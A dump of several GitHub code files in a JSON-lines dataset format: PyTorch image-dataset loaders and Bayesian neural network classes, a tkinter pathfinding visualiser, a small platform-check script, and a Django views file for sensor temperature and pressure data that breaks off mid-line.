workers: int = 6,\n augment: bool = True,\n splits: Union[str, Tuple[str]] = ('train', 'val')) -> LoaderTypes:\n \"\"\"Wrapper for loading the `CIFAR10` dataset.\n\n Args:\n root: The root directory where the dataset is stored. Usually ~/.torch/datasets.\n batch_size: The batch size.\n workers: The number of CPUs to use for when loading the data from disk.\n augment: Whether to use data augmentation when training.\n splits: Which splits of the data to return. Possible values are `train`, `val` and `test`.\n\n Returns:\n A list data loaders of the chosen splits.\n \"\"\"\n normalize = Normalize([0.4914, 0.4822, 0.4465], [0.2023, 0.1994, 0.2010])\n val_transform = Compose([ToTensor(), normalize])\n if augment:\n transform = Compose(\n [RandomCrop(32, padding=4),\n RandomHorizontalFlip(),\n ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\n RandomRotation(degrees=5),\n ToTensor(),\n normalize])\n else:\n transform = val_transform\n\n loader_list = list()\n if 'train' in splits:\n train_val_set = CIFAR10(root, train=True, transform=transform, download=True)\n train_loader = DataLoader(train_val_set, batch_size=batch_size, shuffle=True, num_workers=workers,\n pin_memory=True)\n loader_list.append(train_loader)\n if 'test' in splits or 'val' in splits:\n val_test_set = CIFAR10(root, train=False, transform=val_transform, download=True)\n val_set, test_set = torch.utils.data.random_split(val_test_set, [5000, 5000])\n\n if 'val' in splits:\n val_set = Memory(val_set, img_size=32, channels=3)\n for _ in val_set:\n pass\n val_set.set_use_cache(True)\n val_set.pin_memory()\n loader_list.append(val_set)\n\n if 'test' in splits:\n test_set = Memory(test_set, img_size=32, channels=3)\n for _ in test_set:\n pass\n test_set.set_use_cache(True)\n test_set.pin_memory()\n loader_list.append(test_set)\n\n if len(loader_list) == 1:\n return loader_list[0]\n return loader_list\n\n\ndef svhn(root: str,\n batch_size: int = 32,\n workers: int = 6,\n splits: Union[str, Tuple[str]] = ('train', 'val')) -> LoaderTypes:\n \"\"\"Wrapper for loading the `SVHN` dataset.\n\n Args:\n root: The root directory where the dataset is stored. Usually ~/.torch/datasets.\n batch_size: The batch size.\n workers: The number of CPUs to use for when loading the data from disk.\n splits: Which splits of the data to return. Possible values are `train`, `val` and `test`.\n\n Returns:\n A list data loaders of the chosen splits.\n \"\"\"\n transform = Compose([ToTensor(), Normalize([0.4914, 0.4822, 0.4465], [0.2023, 0.1994, 0.2010])])\n\n loader_list = list()\n if 'train' in splits:\n train_set = SVHN(root, split='train', transform=transform, download=True)\n train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=True, num_workers=workers, pin_memory=True)\n loader_list.append(train_loader)\n if 'test' in splits or 'val' in splits:\n val_test_set = SVHN(root, split='test', transform=transform, download=True)\n val_set, test_set, rest = torch.utils.data.random_split(val_test_set, [5000, 5000, len(val_test_set) - 10000])\n\n if 'val' in splits:\n val_set = Memory(val_set, img_size=32, channels=3)\n for _ in val_set:\n pass\n val_set.set_use_cache(True)\n val_set.pin_memory()\n loader_list.append(val_set)\n\n if 'test' in splits:\n test_set = Memory(test_set, img_size=32, channels=3)\n for _ in test_set:\n pass\n test_set.set_use_cache(True)\n test_set.pin_memory()\n loader_list.append(test_set)\n\n if len(loader_list) == 1:\n return loader_list[0]\n return loader_list\n\n\ndef art(root: str,\n img_size: int = 224,\n batch_size: int = 32,\n workers: int = 6,\n pin_memory: bool = True,\n use_cache: bool = False,\n pre_cache: bool = False) -> DataLoader:\n \"\"\"A dataset consisting of works of arts; mostly paintings.\n Source: https://www.kaggle.com/c/painter-by-numbers/data.\n\n Args:\n root: The root directory where the image data is stored.\n img_size: The size of the image.\n batch_size: The batch size.\n workers: The number of CPUs to use for when loading the data from disk.\n pin_memory: Whether to use the PyTorchs `pin memory` mechanism.\n use_cache: Whether to cache data in a `Cache` object.\n pre_cache: Whether to run caching before the first epoch.\n\n Returns:\n Data loader of the test split.\n \"\"\"\n transform = Compose([\n Resize(int(img_size * 8 / 7)),\n CenterCrop(img_size),\n ToTensor(),\n Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n\n data = ImageFolder(root, transform)\n test_set, rest_set = torch.utils.data.random_split(data, [25000, len(data) - 25000])\n if use_cache:\n test_set = Cashed(test_set, img_size, channels=3)\n test_loader = DataLoader(test_set, batch_size=batch_size, num_workers=workers, pin_memory=pin_memory)\n if use_cache and pre_cache:\n print(\"Caching\")\n for _ in tqdm(test_loader):\n pass\n test_loader.dataset.set_use_cache(True)\n # test_loader.dataset.pin_memory()\n return test_loader\n\n\ndef imagenet(root: str,\n img_size: int = 224,\n batch_size: int = 32,\n augment: bool = True,\n workers: int = 6,\n splits: Union[str, Tuple[str]] = ('train', 'val'),\n tiny: bool = False,\n pin_memory: bool = True,\n use_cache: bool = False,\n pre_cache: bool = False) -> Union[DataLoader, List[DataLoader]]:\n \"\"\"Data loader for the ImageNet dataset.\n\n Args:\n root: The root directory where the image data is stored. Must contain a `train` and `val` directory with\n training and validation data respectively. If `tiny` is set to True, it must contain a `tiny` directory.\n img_size: The size of the image.\n batch_size: The batch size.\n augment: Whether to use data augmentation techniques.\n workers: The number of CPUs to use for when loading the data from disk.\n splits: Which splits of the data to return. Possible values are `train` and `val`.\n tiny: Whether to use the `Tiny ImageNet dataset `_ instead of the\n full-size data. If True, `root` must contain a `tiny` directory with `train` and `val` directories inside.\n pin_memory: Whether to use the PyTorchs `pin memory` mechanism.\n use_cache: Whether to cache data in a `Cache` object.\n pre_cache: Whether to run caching before the first epoch.\n\n Returns:\n A list data loaders of the chosen splits.\n \"\"\"\n if tiny:\n root = os.path.join(root, 'tiny')\n train_dir = os.path.join(root, 'train')\n test_dir = os.path.join(root, 'val')\n\n normalize = Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n val_transform_list = list()\n if not tiny:\n val_transform_list.append(Resize(int(img_size * 8 / 7)))\n val_transform_list.append(CenterCrop(img_size))\n val_transform_list.append(ToTensor())\n val_transform_list.append(normalize)\n val_transform = Compose(val_transform_list)\n\n train_transform_list = list()\n if tiny:\n train_transform_list.append(RandomCrop(img_size, padding=8))\n else:\n train_transform_list.append(RandomResizedCrop(img_size))\n train_transform_list.append(RandomHorizontalFlip())\n train_transform_list.append(ToTensor())\n train_transform_list.append(normalize)\n train_transform = Compose(train_transform_list)\n\n loader_list = list()\n if 'train' in splits:\n train_set = ImageFolder(train_dir, train_transform if augment else val_transform)\n train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=True, num_workers=workers,\n pin_memory=pin_memory)\n loader_list.append(train_loader)\n\n if 'val' or 'test' in splits:\n val_test_set = ImageFolder(test_dir, val_transform)\n val_set, test_set = torch.utils.data.random_split(val_test_set, [25000, 25000])\n\n if 'test' in splits:\n if use_cache:\n test_set = Cashed(test_set, img_size, channels=3)\n test_loader = DataLoader(test_set, batch_size=batch_size, num_workers=workers, pin_memory=pin_memory)\n if use_cache and pre_cache:\n print(\"Caching\")\n for _ in tqdm(test_loader):\n pass\n test_loader.dataset.set_use_cache(True)\n # test_loader.dataset.pin_memory()\n loader_list.append(test_loader)\n\n if 'val' in splits:\n if use_cache:\n val_set = Cashed(val_set, img_size, channels=3)\n val_loader = DataLoader(val_set, batch_size=batch_size, num_workers=workers, pin_memory=pin_memory)\n if use_cache and pre_cache:\n print(\"Caching\")\n for _ in tqdm(val_loader):\n pass\n val_loader.dataset.set_use_cache(True)\n # val_loader.dataset.pin_memory()\n loader_list.append(val_loader)\n\n if len(loader_list) == 1:\n return loader_list[0]\n return loader_list\n\n\nLoaderLists = Union[\n Union[List[Cashed], List[Memory]],\n Union[List[Cashed], List[DataLoader]],\n Union[List[Memory], List[DataLoader]],\n Union[List[Memory], List[DataLoader], List[Cashed]]]\n\n\ndef gtsrb(root: str,\n img_size: int = 32,\n batch_size: int = 32,\n workers: int = 6,\n splits: Union[str, Tuple[str]] = ('train', 'val'),\n pin_memory: bool = True) -> Union[LoaderTypes, Cashed, LoaderLists]:\n \"\"\"Data loader for the `German Traffic Sign Recognition Benchmark\n `_.\n\n Args:\n root: The root directory where the image data is stored. Must contain a `train`, `val` and `test` directory with\n training, validation and test data respectively.\n img_size: The size of the image.\n batch_size: The batch size.\n workers: The number of CPUs to use for when loading the data from disk.\n splits: Which splits of the data to return. Possible values are `train`, `val` and `test`.\n pin_memory: Whether to use the PyTorchs `pin memory` mechanism.\n\n Returns:\n A list data loaders of the chosen splits.\n \"\"\"\n train_dir = os.path.join(root, 'train')\n val_dir = os.path.join(root, 'val')\n test_dir = os.path.join(root, 'test')\n\n normalize = Normalize([0.34038433, 0.3119956, 0.32119358], [0.05087305, 0.05426421, 0.05859348])\n if img_size > 32:\n val_transform = Compose([Resize(int(img_size * 8 / 7)),\n CenterCrop(img_size),\n ToTensor(),\n normalize])\n train_transform = Compose([RandomResizedCrop(img_size),\n RandomAffine(degrees=15, translate=(0.1, 0.1), shear=10),\n ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\n ToTensor(),\n normalize])\n else:\n val_transform = Compose([Resize(img_size + 10),\n CenterCrop(img_size),\n ToTensor(),\n normalize])\n train_transform = Compose([RandomCrop(img_size, padding=4),\n RandomAffine(degrees=15, translate=(0.1, 0.1), scale=(0.9, 1.1), shear=10),\n ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\n ToTensor(),\n normalize])\n\n loader_list = list()\n if 'train' in splits:\n train_set = ImageFolder(train_dir, train_transform)\n\n weights = list()\n for c in range(43):\n dir_name = f\"000{c}\" if c > 9 else f\"0000{c}\"\n weights.append(len(os.listdir(os.path.join(train_dir, dir_name))[:-1]))\n weights = 1 / np.array(weights)\n weights = np.array([weights[t] for t in train_set.targets])\n sampler = torch.utils.data.sampler.WeightedRandomSampler(torch.from_numpy(weights).double(), len(weights))\n\n train_loader = DataLoader(train_set, batch_size=batch_size, sampler=sampler, num_workers=workers,\n pin_memory=pin_memory)\n loader_list.append(train_loader)\n if 'val' in splits:\n val_set = ImageFolder(val_dir, val_transform)\n if img_size > 32:\n val_set = Cashed(val_set, img_size, channels=3)\n val_loader = DataLoader(val_set, batch_size=batch_size, num_workers=workers,\n pin_memory=pin_memory)\n for _ in val_loader:\n pass\n val_loader.dataset.set_use_cache(True)\n val_loader.dataset.pin_memory()\n loader_list.append(val_loader)\n else:\n val_set = Memory(val_set, img_size=img_size, channels=3)\n for _ in val_set:\n pass\n val_set.set_use_cache(True)\n val_set.pin_memory()\n loader_list.append(val_set)\n\n if 'test' in splits:\n test_set = ImageFolder(test_dir, val_transform)\n test_set = Memory(test_set, img_size=img_size, channels=3)\n for _ in test_set:\n pass\n test_set.set_use_cache(True)\n test_set.pin_memory()\n loader_list.append(test_set)\n\n if len(loader_list) == 1:\n return loader_list[0]\n return loader_list\n","repo_name":"DLR-RM/curvature","sub_path":"curvature/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":27842,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"35"} +{"seq_id":"21624332451","text":"from tkinter import *\nimport time\nfrom MapLogic import *\nfrom Path import *\nimport random\n\nrenderMap = Map([20,16],50)\n\nX = renderMap.dim[0]*renderMap.div\nY = renderMap.dim[1]*renderMap.div\nh = renderMap.div # Grid division width\n\ninitReg = random.randrange(0,renderMap.dim[0]*renderMap.dim[1]+1)\ntermReg = random.choice([random.randrange(0,initReg), random.randrange(initReg + 1, renderMap.dim[0]*renderMap.dim[1]+1)])\n\n\ndrawnObstacles = {}\n\ndef toggleObstacle(event):\n reg = renderMap.regionList[renderMap.objCoordinateToRef([event.x,event.y])]\n if reg.ref in drawnObstacles:\n canvas.delete(\"obstacle\" + str(reg.ref))\n drawnObstacles.pop(reg.ref)\n renderMap.regionList[reg.ref].traverse = True\n\n else:\n renderMap.regionList[reg.ref].traverse = False\n drawnObstacles[reg.ref] = canvas.create_rectangle([i*h for i in reg.corners[0] + reg.corners[2]], fill=\"grey20\", outline=\"\", tags=\"obstacle\" + str(reg.ref))\n\ndef printObstacles(event):\n print(drawnObstacles.keys())\n\ndef genPath(event):\n path, queue = floodFill(renderMap,initReg,termReg)\n colours = colourGradient(len(path))\n print(path)\n print(queue)\n for x in queue:\n reference = x[0]\n region = renderMap.regionList[reference]\n canvas.create_rectangle([i*h for i in region.corners[0] + region.corners[2]], fill=colours[x[1]], outline=\"\")\n \n for j in range(0,len(path)-1):\n canvas.create_line([k*h for k in renderMap.regionList[path[j]].centre + renderMap.regionList[path[j+1]].centre], fill=\"#094481\", width=4)\n #canvas.create_oval([renderMap.regionList[path[j+1]].corners[0]*h-2, renderMap.regionList[path[j+1]].corners[1]*h-2, renderMap.regionList[path[j+1]].corners[0]*h+2, renderMap.regionList[path[j+1]].corners[1]*h+2], fill=\"#094481\", width=4)\n\n\n\n\n\ndef colourGradient(maxSteps):\n startGreenRGB = [250,250,110]\n endRedRGB = [159,21,21]\n output = ['#%02x%02x%02x' % (startGreenRGB[0], startGreenRGB[1], startGreenRGB[2])]\n\n for i in range(1,maxSteps):\n output.append('#%02x%02x%02x' % (startGreenRGB[0]+i*(endRedRGB[0]-startGreenRGB[0])//maxSteps, startGreenRGB[1]+i*(endRedRGB[1]-startGreenRGB[1])//maxSteps, startGreenRGB[2]+i*(endRedRGB[2]-startGreenRGB[2])//maxSteps))\n \n output.append('#%02x%02x%02x' % (endRedRGB[0], endRedRGB[1], endRedRGB[2]))\n\n return output\n\ngui = Tk()\ngui.geometry(str(X) + \"x\" + str(Y))\ngui.title(\"Pathfinder\")\n\ncanvas = Canvas(gui, width=X, height=Y, bg='grey90')\ncanvas.bind(\"\", toggleObstacle)\ncanvas.bind(\"\", printObstacles)\ngui.bind(\"\", genPath)\ncanvas.pack()\n\n# Creates vertical grid lines\nfor i in range(0,X,h):\n canvas.create_line(i,0,i,Y, fill=\"grey80\", width=2)\n\n# Creates horizontal grid lines\nfor j in range(0,Y,h):\n canvas.create_line(0,j,X,j, fill=\"grey80\", width=2)\n\n# Create the start and end point rectangles.\ncanvas.create_rectangle([i*h for i in renderMap.regionList[initReg].corners[0] + renderMap.regionList[initReg].corners[2]], fill=\"#af3448\")\ncanvas.create_rectangle([i*h for i in renderMap.regionList[termReg].corners[0] + renderMap.regionList[termReg].corners[2]], fill=\"#360981\")\n\ngui.mainloop()\n\n","repo_name":"AdamDriver26/Pathfinding","sub_path":"Render.py","file_name":"Render.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8877041117","text":"#!/usr/bin/env python3\n\nimport platform\n\ntask = \"\"\"\nTask:\nWrite a Python program to determine if a Python shell is executing in 32bit or 64bit mode on OS. \n\"\"\"\n\nprint(task)\n\nprint(\"OS mode is\", platform.architecture()[0])","repo_name":"woodyart/py-excercises","sub_path":"basic-part-i/042.py","file_name":"042.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15659445718","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nÉditeur de Spyder\r\n\r\nCeci est un script temporaire.\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.axes_grid1 import ImageGrid\r\nimport os\r\nimport time\r\n\r\nimport torch\r\nfrom torch.distributions import Normal\r\nimport torchvision\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nfrom tqdm import trange\r\n\r\nfrom torchvision.transforms import transforms\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.utils.data import Dataset\r\nimport seaborn as sns\r\nimport imgaug\r\n#from keras.datasets import mnist\r\nfrom imgaug import augmenters as iaa\r\n#from keras.utils import np_utils\r\ntorch.set_default_tensor_type('torch.cuda.FloatTensor')\r\n\r\n#@title Early Stopping class\r\nclass EarlyStopping:\r\n \"\"\"Early stops the training if validation loss doesn't improve after a given patience.\"\"\"\r\n def __init__(self, patience=7, verbose=False, delta=0):\r\n \"\"\"\r\n Args:\r\n patience (int): How long to wait after last time validation loss improved.\r\n Default: 7\r\n verbose (bool): If True, prints a message for each validation loss improvement.\r\n Default: False\r\n delta (float): Minimum change in the monitored quantity to qualify as an improvement.\r\n Default: 0\r\n \"\"\"\r\n self.patience = patience\r\n self.verbose = verbose\r\n self.counter = 0\r\n self.best_score = None\r\n self.early_stop = False\r\n self.val_loss_min = np.Inf\r\n self.delta = delta\r\n\r\n def __call__(self, val_loss, model, path):\r\n\r\n score = -val_loss\r\n # 1st iteration\r\n if self.best_score is None:\r\n self.best_score = score\r\n self.save_checkpoint(val_loss, model, path)\r\n elif score < self.best_score + self.delta:\r\n self.counter += 1\r\n print(f'EarlyStopping counter: {self.counter} out of {self.patience}')\r\n if self.counter >= self.patience:\r\n self.early_stop = True\r\n else:\r\n self.best_score = score\r\n self.save_checkpoint(val_loss, model, path)\r\n self.counter = 0\r\n\r\n def save_checkpoint(self, val_loss, model, path):\r\n '''Saves model when validation loss decrease.'''\r\n if self.verbose:\r\n print(f'Validation loss decreased ({self.val_loss_min:.6f} --> {val_loss:.6f}). Saving model ...')\r\n # if not os.path.exists(path):\r\n # os.makedirs(path)\r\n # torch.save(model.state_dict(), path+'/checkpoint.pt')\r\n self.val_loss_min = val_loss\r\n\r\n# @title Dataset class\r\nclass MyData(Dataset):\r\n 'Characterizes a dataset for PyTorch'\r\n def __init__(self, data, labels, return_perturb=False, sample_size=None, augmentation=None, training=False):\r\n 'Initialization'\r\n self.labels = labels\r\n self.data = data\r\n self.return_perturb = return_perturb\r\n self.augmentation = augmentation\r\n self.sample_size = sample_size\r\n self.training = training\r\n\r\n def __len__(self):\r\n 'Denotes the total number of samples'\r\n return len(self.data)\r\n\r\n def __getitem__(self, index):\r\n 'Generates one sample of data'\r\n # Select sample\r\n X = self.data[index]\r\n h, w = X.shape\r\n # Load data and get label\r\n y = self.labels[index]\r\n if self.return_perturb==False:\r\n X = X.reshape(-1)\r\n return X,y\r\n elif self.sample_size > 1:\r\n X = X.cpu()\r\n y = y.cpu()\r\n X_repeated = np.tile(X, [self.sample_size, 1, 1]) # Because we want X.shape = (sample_size, 28,28)\r\n y_repeated = np.tile(y, [self.sample_size, 1]) # Because we want y.shape = (sample_size, 10)\r\n X_aug = self.augmentation(images=X_repeated)\r\n if self.training:\r\n # import pdb; pdb.set_trace()\r\n X_repeated = X_repeated.reshape(self.sample_size,-1)\r\n X_aug = X_aug.reshape(self.sample_size,-1)\r\n return X_repeated, X_aug, y_repeated\r\n else:\r\n X_aug = self.augmentation(images=X)\r\n X_aug = X_aug.reshape(-1)\r\n X = X.reshape(-1)\r\n return X, X_aug, y\r\n\r\n# @title Gaussian Layer class\r\nclass GaussianLayer(nn.Module):\r\n def __init__(self, shape, standard=False):\r\n super(GaussianLayer, self).__init__()\r\n self.shape = shape\r\n if standard is True:\r\n self.mu = nn.Parameter(torch.zeros(shape))\r\n self.log_var = nn.Parameter(torch.zeros(shape))\r\n else:\r\n self.mu = nn.Parameter(torch.rand(shape))\r\n self.log_var = nn.Parameter(torch.rand(shape))\r\n\r\n def forward(self, num_samples=1):\r\n if not isinstance(num_samples, tuple):\r\n num_samples = (num_samples,)\r\n eps_shape = num_samples + self.shape\r\n eps = torch.randn(eps_shape) # ~ N(0,I)\r\n return self.mu + torch.exp(self.log_var) * eps\r\n\r\n def entropy(self):\r\n distribution = Normal(loc=self.mu, scale=self.log_var.exp())\r\n return distribution.entropy().mean()\r\n\r\n\r\n# @title Invariant Prior class\r\n############### 2. CREATE THE MODEL ###############\r\nclass ApproximateInvariance(nn.Module):\r\n def __init__(self, input_dim, hidden_dim, output_dim, sample_size, prior=GaussianLayer):\r\n super(ApproximateInvariance, self).__init__()\r\n self.prior = prior\r\n self.sample_size = sample_size\r\n self.input_dim = input_dim\r\n self.output_dim = output_dim\r\n self.weight_1 = prior((hidden_dim, input_dim), standard=True)\r\n self.bias_1 = prior((hidden_dim,), standard=True)\r\n self.weight_2 = prior((output_dim, hidden_dim), standard=True)\r\n self.bias_2 = prior((output_dim,), standard=True)\r\n\r\n def batch_forward(self, x, x_aug):\r\n # We remove the num_sample dimension if it is equal to one.\r\n w1 = self.weight_1().squeeze(0)\r\n b1 = self.bias_1()\r\n w2 = self.weight_2().squeeze(0)\r\n b2 = self.bias_2()\r\n\r\n x = F.linear(x, w1, b1)\r\n x = F.relu(x)\r\n x = F.linear(x, w2, b2)\r\n x = F.softmax(x) + 1e-8\r\n\r\n x_aug = F.linear(x_aug, w1, b1)\r\n x_aug = F.relu(x_aug)\r\n x_aug = F.linear(x_aug, w2, b2)\r\n x_aug = F.softmax(x_aug) + 1e-8\r\n return x, x_aug\r\n\r\n def forward(self, x, x_aug):\r\n \"\"\"\r\n We need to compute the output of the neural network for the input x\r\n and the augmented input x_aug with the same weights. And we need\r\n to sample a new set of weights for each augmentation, hence the loop\r\n Input:\r\n x: torch Tensor. shape = (batch_size, num_sample, input_dim)\r\n x_aug: has the same attribute as x. but here for each num_sample there is a different augmentation\r\n while for x the tensor is repeated to leverage broadcasting.\r\n \"\"\"\r\n if self.sample_size > 1:\r\n batch_size, num_samples, _ = x.shape\r\n results = torch.zeros(batch_size, num_samples, self.output_dim)\r\n results_aug = torch.zeros_like(results)\r\n for i in range(num_samples):\r\n results[:,i], results_aug[:,i] = self.batch_forward(x[:,i], x_aug[:,i])\r\n else:\r\n results, results_aug = self.batch_forward(x, x_aug)\r\n return results, results_aug\r\n\r\n def entropy(self):\r\n \"\"\"\r\n Each weight computes its own entropy\r\n \"\"\"\r\n entropy_w1 = self.weight_1.entropy()\r\n entropy_b1 = self.bias_1.entropy()\r\n entropy_w2 = self.weight_2.entropy()\r\n entropy_b2 = self.bias_2.entropy()\r\n return entropy_w1 + entropy_b1 + entropy_w2 + entropy_b2\r\n\r\ndef kl_div_output(pred1, pred2, sample_size):\r\n \"\"\"\r\n This function computes the KL divergence between the output of\r\n the standard neural network and and neural network with augmented data\r\n Input:\r\n pred1. Float tensor. K-class softmax prediction of network 1\r\n pred2. Float tensor. K-class softmax prediction of network 2\r\n Output:\r\n kl_div. Float. The KL divergence between the two\r\n \"\"\"\r\n if sample_size > 1:\r\n batch_size, num_sample, output_dim = pred1.shape\r\n log_ratio = torch.log(pred1/pred2)\r\n kl_div = torch.mean(pred1 * log_ratio, axis=[0,1]) # Average over num_sample and batches\r\n return kl_div.sum()\r\n else:\r\n log_ratio = torch.log(pred1/pred2)\r\n kl_div = torch.mean(pred1 * log_ratio, axis=0) # Average over batches\r\n return kl_div.sum()\r\n\r\n\r\n\r\n# @title Bayes by Backprogagation class\r\nclass BayesbyBackprop(nn.Module):\r\n def __init__(self, input_dim, hidden_dim, output_dim, prior):\r\n super(BayesbyBackprop, self).__init__()\r\n self.prior = prior\r\n self.weight_1 = GaussianLayer((hidden_dim, input_dim))\r\n self.bias_1 = GaussianLayer((hidden_dim,))\r\n self.weight_2 = GaussianLayer((output_dim, hidden_dim))\r\n self.bias_2 = GaussianLayer((output_dim,))\r\n\r\n def forward(self, x):\r\n # We remove the num_sample dimension if it is equal to one.\r\n w1 = self.weight_1().squeeze(0)\r\n b1 = self.bias_1()\r\n w2 = self.weight_2().squeeze(0)\r\n b2 = self.bias_2()\r\n\r\n# import pdb; pdb.set_trace()\r\n\r\n x = F.linear(x, w1, b1)\r\n x = F.selu(x)\r\n x = F.linear(x, w2, b2)\r\n x = F.selu(x)\r\n\r\n return x\r\n\r\n def sample(self, num_samples=5):\r\n w1_samples = self.weight_1(num_samples=num_samples).view((num_samples, -1))\r\n b1_samples = self.bias_1(num_samples=num_samples).view((num_samples, -1))\r\n w2_samples = self.weight_2(num_samples=num_samples).view((num_samples, -1))\r\n b2_samples = self.bias_2(num_samples=num_samples).view((num_samples, -1))\r\n\r\n gen_weights = torch.cat([w1_samples, b1_samples, w2_samples, b2_samples], 1)\r\n\r\n return gen_weights\r\n\r\n def __kl(self, mu_1, log_var_1, mu_2, log_var_2):\r\n \"\"\"\r\n KL divergence between two univariate Gaussian\r\n \"\"\"\r\n var_1 = log_var_1.exp()\r\n var_2 = log_var_2.exp()\r\n kl = torch.mean(log_var_2-log_var_1 + (var_1.pow(2)-var_2.pow(2) + (mu_1-mu_2).pow(2))/(2 * var_2.pow(2)))\r\n return kl\r\n\r\n def KL_loss(self):\r\n kl_w1 = self.__kl(self.weight_1.mu, self.weight_1.log_var, self.prior.weight_1.mu, self.prior.weight_1.log_var)\r\n kl_b1 = self.__kl(self.bias_1.mu, self.bias_1.log_var, self.prior.bias_1.mu, self.prior.bias_1.log_var)\r\n kl_w2 = self.__kl(self.weight_2.mu, self.weight_2.log_var, self.prior.weight_2.mu, self.prior.weight_2.log_var)\r\n kl_b2 = self.__kl(self.bias_2.mu, self.bias_2.log_var, self.prior.bias_2.mu, self.prior.bias_2.log_var)\r\n return (kl_w1 + kl_w2 + kl_b1 + kl_b2)/4\r\n","repo_name":"jmamath/learning-approximate-invariance-requires-far-fewer-data","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":10855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19807070637","text":"from django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom .models import Sensor, Werte\nfrom web.forms.TempsFilterForm import TempsFilterForm\n# from web.forms.HumidsFilterForm import HumidsFilterForm\nfrom web.forms.SensorCreateEditModelForm import SensorCreateEditModelForm\nfrom django.db.models import Max, Min\nfrom django.contrib.auth import authenticate\nfrom datetime import datetime, timedelta\n\ndef login(request):\n if request.method == \"POST\":\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(request, username=username, password=password)\n if user is None:\n return render(request, \"web/login.html\")\n else:\n return redirect(index)\n else:\n return render(request, 'web/login.html')\n\ndef index(request):\n # return HttpResponse(\"Hello, world. You're at the web app.\")\n return render(request, 'web/index.html')\n\ndef display_sensors(request):\n queryset = Sensor.objects.all()\n return render(request, \"web/sensors.html\", {\"sensorlist\": list(queryset)})\n\ndef create_sensor(request):\n \n if request.method == \"POST\":\n form = SensorCreateEditModelForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect(\"/web/sensors\")\n else: \n form = SensorCreateEditModelForm()\n return render(request, \"web/sensor_edit.html\", {\"form\": form})\n \ndef sensordetail(request, sensor_id):\n queryset = Sensor.objects.get(pk=sensor_id)\n print(queryset.sen_raum)\n return render(request, \"web/sensorDetails.html\", {\"data\": {\"sensorId\": sensor_id, \"sensor\": queryset}})\n\n\ndef edit_sensor_details(request, sensor_id):\n sensor = Sensor.objects.get(pk=sensor_id)\n\n if request.method == \"POST\":\n print(\"GET\")\n form = SensorCreateEditModelForm(request.POST, instance=sensor)\n if form.is_valid():\n form.save()\n return redirect(\"/web/sensors/\")\n else:\n print(\"GET\")\n print(sensor_id)\n form = SensorCreateEditModelForm(instance=sensor)\n print(sensor)\n return render(request, \"web/sensor_edit.html\", {\"form\": form})\n\ndef display_temps(request):\n print(\"display_temps\")\n if request.method == \"POST\":\n form = TempsFilterForm(request.POST)\n print(\"display_temps\")\n print(form)\n\n if form.is_valid():\n print(form.cleaned_data)\n lowerVal = form.cleaned_data[\"lowerVal\"]\n if lowerVal is None:\n lowerVal = Werte.objects.aggregate(Min('temperatur'))[\"temperatur__min\"]\n print(lowerVal)\n \n upperVal = form.cleaned_data[\"upperVal\"]\n if upperVal is None:\n upperVal = Werte.objects.aggregate(Max('temperatur'))[\"temperatur__max\"]\n print(upperVal)\n \n # if upperVal is None:\n # upperVal = Werte.ob\n vonDate = form.cleaned_data[\"vonDate\"]\n bisDate = form.cleaned_data[\"bisDate\"]\n print(f\"{lowerVal}, {upperVal}, {vonDate}, {bisDate}\")\n # queryset = Werte.objects.filter(temperatur__lte = form.cleaned_data[\"upperVal\"])\n # queryset = Werte.objects.filter(temperatur__range = (lowerVal, upperVal))\n queryset = Werte.objects.filter(datum__gte = vonDate, datum__lte = (bisDate + timedelta(days=1)),\n temperatur__lte = upperVal, temperatur__gte = lowerVal)\n \n \n return render(request, \"web/temps.html\", {\"page_name\": \"Temperatur\", \"tempslist\": list(queryset), \"form\": form})\n else:\n return HttpResponse(f\"Error! {form.errors}\")\n else:\n print(\"GET\")\n form = TempsFilterForm()\n form.lowerVal = 4\n queryset = Werte.objects.all()\n tempListe = list(queryset)\n #print(dict(queryset))\n print (tempListe)\n return render(request, \"web/temps.html\", {\"page_name\": \"Temperatur\", \"form\": form, \"tempslist\": tempListe})\n\ndef show_press(request):\n if request.method == \"POST\":\n form = TempsFilterForm(request.POST) \n\n if form.is_valid():\n lowerVal = form.cleaned_data[\"lowerVal\"]\n if lowerVal is None:\n lowerVal = Werte.objects.aggregate(Min('luftdruck'))[\"luftdruck__min\"]\n\n upperVal = form.cleaned_data[\"upperVal\"]\n if upperVal is None:\n upperVal = Werte.objects.aggregate(Max('luftdruck'))[\"luftdruck__max\"]\n \n vonDate = form.cleaned_data[\"vonDate\"]\n bisDate = form.cleaned_data[\"bisDate\"]\n\n queryset = Werte.objects.filter(datum__gte=vonDate, datum__lte=(bisDate + timedelta(days=1)),\n luftdruck__lte=upperVal, luftdruck__gte=lowerVal)\n \n return render(request, \"web/pressure.html\", {\"page_name\": \"Luftdruck\", \"pressList\": list(queryset), \"form\": form})\n \n else:\n form = TempsFilterForm()\n queryset = Werte.objects.all()\n pressList = list(queryset)\n return render(request, \"web/pressure.html\", {\"page_name\": \"Luftdruck\", \"form\": form, \"pressList\": pressList})\n \ndef show_humidity(request):\n if request.method == \"POST\":\n pass\n else:\n form = TempsFilterForm()\n queryset = Werte.objects.all()\n humidityList = list(queryset)\n return render(request, \"web/humidity.html\", 